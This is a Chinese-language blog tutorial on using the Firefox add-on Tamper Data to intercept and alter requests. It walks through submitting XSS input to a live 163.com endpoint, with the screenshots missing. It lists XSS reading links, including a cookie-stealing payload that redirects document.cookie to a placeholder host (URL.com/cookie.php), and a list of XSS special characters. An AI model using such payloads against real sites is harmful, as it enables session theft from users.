使用Tamper Data 提交XSS攻击数据

来源:互联网 发布:根号x 1c语言 编辑:程序博客网 时间:2024/06/05 23:41

使用Tamper Data 提交XSS攻击数据

简介

       作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数,模型web攻击;可以用来跟踪 HTTP 请求和响应并记时;

使用

Tamper提供请求监控和修改功能

2.1 请求监听

工具页面分为:

监控窗口:

firefox所有tab打开网页发送的 HTTP 请求及其对应的响应都会被 Tamper Data 监控下来(默认状态)

左下角窗口为每个请求的头信息。类似Firebug

右下角窗口为每个请求的返回头信息,类似Firebug。请求返回的详细信息,要通过鼠标右键 点击http请求-view source来显示。

注:Filter 可以只显示指定域名的请求。

2.2 拦截请求

在点击Start Tempar之后,会弹窗:


点击Tamper

右键,可以:添加新的请求参数、请求头,在参数名上右键,可以弹出菜单,其中有 xss/sql/data 选项,xss有预定义xss script脚本。或者直接修改 参数对应的value。点击确定之后,就会提交请求。 

XSS攻击示例

对接口,自定义皮肤:http://t.163.com/user.do?action=updateUserConfig进行非法数据提交(xss

Start Tamper,点击页面的保存按钮。

会弹窗:


"Tamper"操作:


修改为:

提交之后:


服务器返回555,后台禁止 非法数据提交。

原理:


. Tamper Option

默认不支持图片拦截,可以在Option选项中启用。Context Menu也可以添加一些自定义数据。


. XSS介绍

http://hi.baidu.com/jinuyasha/blog/item/eb38b91801bcf9ed1ad576a6.html  浅谈反射型XSS的利用

http://huaidan.org/archives/2561.html  基于CSRFXSS攻击

http://huaidan.org/archives/2450.html Anehta -- Boomerang(回旋镖),如何将反射型XSS变成持久型XSS:论跨域获取cookie

http://huaidan.org/archives/674.html XSS攻击Cookie欺骗中隐藏JavaScript执行

 http://t.163.com/nathanliu#!javascript:alert(document.cookie);   如果url中是这样的脚本:document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) 

http://www.cnblogs.com/jonniexie/articles/1761813.html 【WebGoat笔记】之四 --- Cross-Site Scripting (XSS) CSRF

http://www.4shell.org/archives/468.html  Anehta -- 新一代的web攻击平台

http://huaidan.org/archives/650.html  在XSS中如何再插JS(解决方案,用户输入img src的时候要验证srchttp格式)

http://baike.baidu.com/view/2161269.htm  XSS攻击


xss攻击常用符号:

[1] <>(尖括号)

[2] "(引号)

[3] '(单引号)

[4] %(百分比符号)

[5] ;(分号)

[6] ()(括号)

[7] &符号)

[8] +(加号)




原创粉丝点击